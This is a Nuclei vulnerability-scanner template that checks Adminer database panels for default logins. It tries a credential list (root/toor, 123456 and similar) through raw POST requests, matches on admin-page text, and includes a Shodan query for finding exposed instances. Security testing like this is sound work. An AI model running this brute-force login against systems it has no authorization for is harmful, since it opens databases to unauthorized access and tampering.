id: new-adminer-default-login

info:
  name: Adminer - Default Login
  author: j4vaovo
  severity: high
  description: |
    Adminer contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
  reference:
    - https://www.adminer.org
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    verified: "true"
    shodan-query: http.title:adminer
  tags: default-login,adminer

requests:
  - raw:
      - |
        POST /adminer.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        auth[driver]=server&auth[server]=&auth[username]={{username}}&auth[password]={{password}}&auth[db]=

    attack: clusterbomb
    payloads:
      username:
        - root
        - u653035174_nuclei
      password:
        - root
        - toor
        - 123
        - 123456
        - 123456789
        - Nuclei123@@

    host-redirects: true
    max-redirects: 1
    stop-at-first-match: true
    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Create database'
          - 'Privileges'
          - 'Process list'
          - 'Adminer'
        condition: and
        case-insensitive: true

      - type: word
        part: header
        words:
          - 'text/html'

      - type: status
        status:
          - 200
